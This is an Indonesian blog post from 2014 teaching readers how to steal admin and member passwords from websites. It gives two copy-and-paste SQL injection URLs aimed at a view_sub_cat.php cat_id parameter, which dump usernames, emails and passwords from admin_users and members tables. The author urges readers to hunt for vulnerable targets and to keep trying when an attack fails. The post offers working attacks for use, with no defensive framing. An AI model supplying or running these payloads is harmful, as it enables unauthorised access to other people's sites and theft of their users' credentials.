Assalamu'alaikum sob MWB ... 
Kali ini ane akan ngebahas tentang Cara Bagaimana Membobol Pasword Admin
Dan Member Pada Alamat Website Dan Blog, di sini ane akan jelaskan
bahan-bahan apa saja yang di gunakan agar bisa membobol admin+paswordnya
suatu alamat website maupun blog terkecuali jika dia seorang hacking
sudah pasti dia tahu cara menyelamatkannya dan cara menjaganya, oke
langsung saja kita ke tkp okrey,,
Kita akan menggunakan yang paling sederhana dulu dari sekian cara, yang
ane mau share disini adalah dengan SQL Injection jika sobat-sobat
funtasticer sudah tau dengan yang satu ini acuhkan saja okrey, yu kita
meluncur saja:
sekarang
index.php di hapus saja dan di ganti dng exploit nya di bawah ini (ini
buat ngeinjeksi admin+paswordnya) copy semua yang bertanda merahnya
jangan sampai terlewatkan okrey,.
view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,admin_user,0x3a,admin_password,0x3C62723E),4/**/FROM/**/admin_users/*
setelah
index.phpnya di ganti di paste&go aja langsung sob jika tidak
tembus berarti websitenya pake pengaman peginjeksian, coba aja cari
target yang lebih-lebih gampang asal satu syarat punya ane jangan di
injeksi ya sob entar malah yang ente ane acak-acak,,he he
dan ini saya kasih bonus expolitnya buat membobol membernya
serta+paswordnya, copy semua di bawah ini yang bertanda merahnya okrey,.
view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,member_email,0x3a,member_password,0x3C62723E),4/**/FROM/**/members/*
jika
sobat gagal satu kali dua kali itu wajar-wajar saja karena mempelajari
sesuatu itu tidak ada yang langsung bisa,, karena
Wassalam ...
Monday, 3 February 2014
